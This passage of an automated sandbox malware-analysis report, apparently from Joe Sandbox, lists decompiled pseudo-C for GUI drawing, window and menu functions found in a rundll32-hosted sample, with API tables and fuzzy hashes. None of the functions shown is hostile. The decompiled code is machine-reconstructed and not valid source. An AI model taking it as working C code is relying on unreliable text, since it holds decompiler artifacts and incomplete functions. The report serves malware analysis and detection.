					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t194);
					_push(0xe34ef1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t196;
					_v28 = E00E31174(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t192 + 0xc));
					E00E31318( *(_v8 + 4), _t170, _t190[1],  *_t190, _t190, _t192, 0, 0, _v28,  *(_t192 + 0x20),  *(_t192 + 0x1c), 0, 0,  *(E00E34FF0(_t170) + 4), _t190[3] - _t190[1], _t190[2] -  *_t190);
					_t140 = 0;
					_pop(_t186);
					 *[fs:eax] = _t186;
					_push(0xe34f36);
					if(_v32 != 0) {
						_t140 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t140;
				}
			}

0x00e34d20
0x00e34d21
0x00e34d23
0x00e34d29
0x00e34d2b
0x00e34d2e
0x00e34d30
0x00e34d33
0x00e34d3c
0x00e34d43
0x00e34d4a
0x00e34d4d
0x00e34d51
0x00e34d56
0x00e34d67
0x00e34d71
0x00e34d76
0x00e34d76
0x00e34d88
0x00e34d92
0x00e34d99
0x00e34d9a
0x00e34d9f
0x00e34db0
0x00e34db0
0x00e34da1
0x00e34da5
0x00e34dae
0x00e34db4
0x00000000
0x00000000
0x00000000
0x00e34dae
0x00e34db8
0x00e34dfb
0x00e34e08
0x00e34e08
0x00e34dba
0x00e34dc5
0x00e34dd3
0x00e34deb
0x00e34deb
0x00e34e0f
0x00e34e10
0x00e34e15
0x00e34e18
0x00e34e24
0x00e34e28
0x00e34e28
0x00e34e2f
0x00e34e34
0x00e34e3a
0x00e34e48
0x00e34f31
0x00e34f38
0x00e34f3b
0x00e34f3e
0x00e34f47
0x00000000
0x00e34f56
0x00e34f5b
0x00e34e4e
0x00e34e50
0x00e34e55
0x00e34e5a
0x00e34e5b
0x00e34e60
0x00e34e63
0x00e34e72
0x00e34e82
0x00e34ebc
0x00e34ec1
0x00e34ec3
0x00e34ec6
0x00e34ec9
0x00e34ed2
0x00e34edc
0x00e34edc
0x00e34ee5
0x00000000
0x00e34eeb
0x00e34ef0
0x00e34ef0

APIs

Part of subcall function 00E3539C: GetDC.USER32(00000000), ref: 00E353F2
Part of subcall function 00E3539C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E35407
Part of subcall function 00E3539C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00E35411
Part of subcall function 00E3539C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00E33EE7,00000000,00E33F73), ref: 00E35435
Part of subcall function 00E3539C: ReleaseDC.USER32 ref: 00E35440

SelectPalette.GDI32(?,?,000000FF), ref: 00E34D62
RealizePalette.GDI32(?), ref: 00E34D71
GetDeviceCaps.GDI32(?,0000000C), ref: 00E34D83
GetDeviceCaps.GDI32(?,0000000E), ref: 00E34D92
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00E34DC5
SetStretchBltMode.GDI32(?,00000004), ref: 00E34DD3
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00E34DEB
SetStretchBltMode.GDI32(00000000,00000003), ref: 00E34E08
CreateCompatibleDC.GDI32(00000000), ref: 00E34E68
SelectObject.GDI32(?,?), ref: 00E34E7D
SelectObject.GDI32(?,00000000), ref: 00E34EDC
DeleteDC.GDI32(00000000), ref: 00E34EEB

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: 80ea553358243992adb49cc544492fa8c416b4a27be6142a2d65ba4e692aea68
Instruction ID: 4145e89f612662c079911446e278366097a368046481378a7366f0b945d1a875
Opcode Fuzzy Hash: 80ea553358243992adb49cc544492fa8c416b4a27be6142a2d65ba4e692aea68
Instruction Fuzzy Hash: 127109B5B00205AFDB50DFACC999F9EBBF8AF08304F15A594B508EB692D634ED44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E31184 Relevance: 21.1, APIs: 14, Instructions: 131
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00E31184(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				struct HBITMAP__* _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				void* _t78;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;

				_t93 = _t94;
				_t95 = _t94 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t77 = __ecx;
				_v8 = __eax;
				_v28 = CreateCompatibleDC(0);
				_v32 = CreateCompatibleDC(0);
				_push(_t93);
				_push(0xe312d2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t95;
				GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_v24 = GetDC(0);
					if(_v24 == 0) {
						E00E310CC(_t77);
					}
					_push(_t93);
					_push(0xe31241);
					_push( *[fs:eax]);
					 *[fs:eax] = _t95;
					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
					if(_v20 == 0) {
						E00E310CC(_t77);
					}
					_pop(_t85);
					 *[fs:eax] = _t85;
					_push(0xe31248);
					return ReleaseDC(0, _v24);
				} else {
					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
					if(_v20 != 0) {
						_t78 = SelectObject(_v28, _v8);
						_t91 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t78 != 0) {
							SelectObject(_v28, _t78);
						}
						if(_t91 != 0) {
							SelectObject(_v32, _t91);
						}
					}
					_pop(_t86);
					 *[fs:eax] = _t86;
					_push(0xe312d9);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}

0x00e31185
0x00e31187
0x00e31192
0x00e31193
0x00e31194
0x00e31196
0x00e311a0
0x00e311aa
0x00e311af
0x00e311b0
0x00e311b5
0x00e311b8
0x00e311c5
0x00e311cc
0x00e311ed
0x00e311f4
0x00e311f6
0x00e311f6
0x00e311fd
0x00e311fe
0x00e31203
0x00e31206
0x00e3121a
0x00e31221
0x00e31223
0x00e31223
0x00e3122a
0x00e3122d
0x00e31230
0x00e31240
0x00e311ce
0x00e311e1
0x00e3124c
0x00e3125b
0x00e3126a
0x00e31291
0x00e31298
0x00e3129f
0x00e3129f
0x00e312a6
0x00e312ad
0x00e312ad
0x00e312a6
0x00e312b4
0x00e312b7
0x00e312ba
0x00e312c3
0x00e312d1
0x00e312d1

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00E3119B
CreateCompatibleDC.GDI32(00000000), ref: 00E311A5
GetObjectA.GDI32(?,00000018,?), ref: 00E311C5
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00E311DC
GetDC.USER32(00000000), ref: 00E311E8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00E31215
ReleaseDC.USER32 ref: 00E3123B
SelectObject.GDI32(?,?), ref: 00E31256
SelectObject.GDI32(?,00000000), ref: 00E31265
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00E31291
SelectObject.GDI32(?,00000000), ref: 00E3129F
SelectObject.GDI32(?,00000000), ref: 00E312AD
DeleteDC.GDI32(?), ref: 00E312C3
DeleteDC.GDI32(?), ref: 00E312CC

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: 32d3001ca5ea1ec64b2cd1edbfa8808295b7e879651819ac945f2b90173d9ea2
Instruction ID: 08a7927723845f9b106d8bdf5e61230e5b27d702b6ebf468ec8aeaad0c7f9484
Opcode Fuzzy Hash: 32d3001ca5ea1ec64b2cd1edbfa8808295b7e879651819ac945f2b90173d9ea2
Instruction Fuzzy Hash: 3741B571E44209AFDB10EBE8C846FEFBBFCAB09700F515859B614F7281D674A940DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E16DC4 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61
registryclipboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E16DC4(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}

0x00e16dcb
0x00e16dcd
0x00e16dcf
0x00e16de1
0x00e16df0
0x00e16dfc
0x00e16e08
0x00e16e0d
0x00e16e2c
0x00e16e13
0x00e16e23
0x00e16e23
0x00e16e31
0x00e16e4e
0x00e16e37
0x00e16e47
0x00e16e47
0x00e16e5b

APIs

FindWindowA.USER32 ref: 00E16DDC
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00E16DE8
RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00E16DF7
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00E16E03
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00E16E1B
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00E16E3F

Strings

MSH_WHEELSUPPORT_MSG, xrefs: 00E16DF2
MouseZ, xrefs: 00E16DD7
MSWHEEL_ROLLMSG, xrefs: 00E16DE3
MSH_SCROLL_LINES_MSG, xrefs: 00E16DFE
Magellan MSWHEEL, xrefs: 00E16DD2

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: ClipboardFormatRegister$MessageSend$FindWindow
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1416857345-3736581797
Opcode ID: 37ac073460dbdad2f64251906e21fc8a5dd29976c85ce285e100239c0d877c03
Instruction ID: 676e8cfb7c75f9307407b2f8a17d9fca21b3851dffdabcf4a2744040beff0283
Opcode Fuzzy Hash: 37ac073460dbdad2f64251906e21fc8a5dd29976c85ce285e100239c0d877c03
Instruction Fuzzy Hash: B4112EB8344306AFE7109F64D881FEAB7E8EF45750F206625F844AB280D7B05EC0CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E3B68C Relevance: 18.1, APIs: 12, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00E3B68C(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				signed int _t79;
				int _t80;
				int _t81;
				void* _t94;
				intOrPtr _t107;
				void* _t116;
				void* _t119;
				void* _t122;
				void* _t124;
				intOrPtr _t125;

				_t122 = _t124;
				_t125 = _t124 + 0xffffffbc;
				_t94 = __ecx;
				_v8 = __edx;
				_t116 = __eax;
				_t43 = GetWindowLongA(E00E5CFE0(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E00E5CFE0(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_v12 = GetWindowDC(E00E5CFE0(_v8));
					_push(_t122);
					_push(0xe3b7e7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t125;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t119 = _t116;
					if(_t94 != 0) {
						_t79 = GetWindowLongA(E00E5CFE0(_v8), 0xfffffff0);
						if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) {
							_t80 = GetSystemMetrics(2);
							_t81 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E00E25C48(_v28.right - _t80, _v28.right, _v28.bottom - _t81,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t119 = _t119;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00E3B2C4( &_v56, 2);
					E00E3B218(_t119,  &_v56, _v12, 0,  &_v44);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0xe3b7ee);
					return ReleaseDC(E00E5CFE0(_v8), _v12);
				}
			}

0x00e3b68d
0x00e3b68f
0x00e3b695
0x00e3b697
0x00e3b69a
0x00e3b6a7
0x00e3b6af
0x00e3b7f4
0x00e3b6b5
0x00e3b6c2
0x00e3b6d7
0x00e3b6ea
0x00e3b6ef
0x00e3b6f0
0x00e3b6f5
0x00e3b6f8
0x00e3b702
0x00e3b703
0x00e3b704
0x00e3b705
0x00e3b706
0x00e3b709
0x00e3b716
0x00e3b720
0x00e3b72b
0x00e3b734
0x00e3b743
0x00e3b75d
0x00e3b769
0x00e3b76a
0x00e3b76b
0x00e3b76c
0x00e3b76d
0x00e3b77e
0x00e3b77e
0x00e3b720
0x00e3b7a3
0x00e3b7af
0x00e3b7c2
0x00e3b7c9
0x00e3b7cc
0x00e3b7cf
0x00e3b7e6
0x00e3b7e6

APIs

GetWindowLongA.USER32 ref: 00E3B6A7
GetWindowRect.USER32 ref: 00E3B6C2
OffsetRect.USER32(?,?,?), ref: 00E3B6D7
GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00E3B6E5
GetWindowLongA.USER32 ref: 00E3B716
GetSystemMetrics.USER32 ref: 00E3B72B
GetSystemMetrics.USER32 ref: 00E3B734
InflateRect.USER32(?,000000FE,000000FE), ref: 00E3B743
GetSysColorBrush.USER32(0000000F), ref: 00E3B770
FillRect.USER32 ref: 00E3B77E
ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00E3B7E7,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00E3B7A3
ReleaseDC.USER32 ref: 00E3B7E1

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
String ID:
API String ID: 19621357-0
Opcode ID: b2ab2b13af46f214bd231a19bb4f9bb3c3f3468517a2a4e67e155fa1dfb7589e
Instruction ID: 897bf129c4d30b5df4fc701739543f1f591ce620186ef6200179c7abe4776bbb
Opcode Fuzzy Hash: b2ab2b13af46f214bd231a19bb4f9bb3c3f3468517a2a4e67e155fa1dfb7589e
Instruction Fuzzy Hash: C3410C71A04118ABCB01EAA8CD46EEFBBFDEF89310F511651F915F7281CA30AA45C760

Uniqueness

Uniqueness Score: -1.00%

Function 00E3751C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00E3751C(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0xe7f923 != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0xe7f910 = E00E36F70(7, _t60,  *0xe7f910, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}

0x00e37525
0x00e37528
0x00e37532
0x00e37562
0x00e37568
0x00e37624
0x00e3762c
0x00e3762c
0x00e37570
0x00e37575
0x00e37580
0x00e3758b
0x00e37590
0x00e375f9
0x00e37611
0x00e37622
0x00e3760d
0x00e3760d
0x00e3760d
0x00000000
0x00e375f9
0x00e3759c
0x00e375ab
0x00000000
0x00000000
0x00e375bd
0x00e375d5
0x00e375eb
0x00000000
0x00000000
0x00e375f1
0x00e375f3
0x00e375f3
0x00000000
0x00000000
0x00000000
0x00000000
0x00e375d5
0x00e37546
0x00e3755b
0x00000000

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 00E37555
GetSystemMetrics.USER32 ref: 00E3757A
GetSystemMetrics.USER32 ref: 00E37585
GetClipBox.GDI32(?,?), ref: 00E37597
GetDCOrgEx.GDI32(?,?), ref: 00E375A4
OffsetRect.USER32(?,?,?), ref: 00E375BD
IntersectRect.USER32 ref: 00E375CE
IntersectRect.USER32 ref: 00E375E4

Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0

Strings

EnumDisplayMonitors, xrefs: 00E37534

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: c7336defbf2a0a318d24cc5fd69875b3284ca51564a5a97445b7364eeebbc11d
Instruction ID: 8cc78ff924b1ce77c406aff1b465b27ac403000c785794be7b94bff165c0ed1a
Opcode Fuzzy Hash: c7336defbf2a0a318d24cc5fd69875b3284ca51564a5a97445b7364eeebbc11d
Instruction Fuzzy Hash: A1312CB2A04609AFDB20DBA9DC49AEF7BFCAF45304F005566E915F2200E7349945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E5ADEC Relevance: 15.2, APIs: 10, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E5ADEC(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E00E2707C( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E00E2FA64(0xff000010));
							E00E25C48( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E00E2FA64(0xff000014));
							E00E25C48( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00E270D8(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E00E2707C( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00E25C48( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E00E55268(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E00E57A98(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}

0x00e5adf0
0x00e5adf3
0x00e5adf5
0x00e5adf7
0x00e5ae00
0x00e5ae1e
0x00e5ae1e
0x00e5ae21
0x00e5ae29
0x00e5af0e
0x00e5af0e
0x00e5af16
0x00e5b01b
0x00e5b01b
0x00e5b01b
0x00e5af1f
0x00e5af22
0x00000000
0x00000000
0x00e5af29
0x00e5af2d
0x00e5af2f
0x00e5af37
0x00e5af3c
0x00e5af45
0x00e5af7f
0x00e5afa2
0x00e5afad
0x00e5afb7
0x00e5afcc
0x00e5afef
0x00e5affa
0x00e5b004
0x00e5b004
0x00e5b009
0x00e5b00a
0x00e5b00a
0x00e5b00a
0x00000000
0x00e5af2f
0x00e5ae2f
0x00e5ae33
0x00e5ae3c
0x00e5ae40
0x00e5ae42
0x00e5ae42
0x00e5ae40
0x00e5ae4d
0x00e5ae53
0x00e5ae59
0x00e5ae66
0x00e5ae6c
0x00e5ae9a
0x00e5aeac
0x00e5aeb2
0x00e5aeb4
0x00e5aeb4
0x00e5aec0
0x00e5aecc
0x00e5aede
0x00e5aeee
0x00e5aef9
0x00e5aefe
0x00e5aefe
0x00e5aeac
0x00e5af04
0x00e5af05
0x00e5ae59

APIs

RectVisible.GDI32(?,?), ref: 00E5AEA5
SaveDC.GDI32(?), ref: 00E5AEBB
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00E5AEDE
RestoreDC.GDI32(?,?), ref: 00E5AEF9
CreateSolidBrush.GDI32(00000000), ref: 00E5AF7A
FrameRect.USER32 ref: 00E5AFAD
DeleteObject.GDI32(?), ref: 00E5AFB7
CreateSolidBrush.GDI32(00000000), ref: 00E5AFC7
FrameRect.USER32 ref: 00E5AFFA
DeleteObject.GDI32(?), ref: 00E5B004

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: c08c65eb5d045d4ce27e2d3884b897740b40b46ef0d5837ce433ffda4b7cf540
Instruction ID: 4edc797232d495020c2e081862fa1521d526b8a96fdfd1649ad8302861690f30
Opcode Fuzzy Hash: c08c65eb5d045d4ce27e2d3884b897740b40b46ef0d5837ce433ffda4b7cf540
Instruction Fuzzy Hash: 9F516D712043449BDB18DF68C8C5B6B77E9AF44304F085968FE899B296EB35EC89CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00E44128 Relevance: 15.1, APIs: 10, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E44128(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E00E5CFE0( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
